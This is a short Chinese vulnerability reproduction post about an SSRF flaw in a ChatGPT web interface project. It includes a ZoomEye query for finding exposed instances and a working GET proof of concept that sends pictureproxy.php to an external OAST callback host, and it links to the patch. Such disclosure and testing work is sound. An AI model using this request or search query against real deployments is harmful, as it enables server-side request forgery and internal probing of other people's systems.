0x00写在前面

本次测试仅供学习使用,如若非法他用,与本平台和发布者无关,需自行负责!

0x01漏洞介绍

ChatGPT是一个基于OpenAI ChatGPT项目API的可视化界面站点。

ChatGPT commit f9f4bbc版本存在安全漏洞,该漏洞源于存在服务器请求伪造(SSRF)漏洞。攻击者可利用该漏洞通过向urlparameter注入特制的URL来迫使应用程序执行任意请求。

0x02影响版本

ChatGPT commit f9f4bbc版本

0x03漏洞复现

  1. zoomeye语法

  2. app:"ChatGPT"

1.访问漏洞环境


2.对漏洞进行复现

 POC (GET)

漏洞复现

GET /pictureproxy.php?url=http://co1ooflblq62hd1n40rg6e11zdodrdikw.oast.fun HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, br

 执行payload

测试DNSlog(漏洞存在)

3.nuclei工具测试(漏洞存在)

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

 https://github.com/dirk1983/chatgpt/issues/114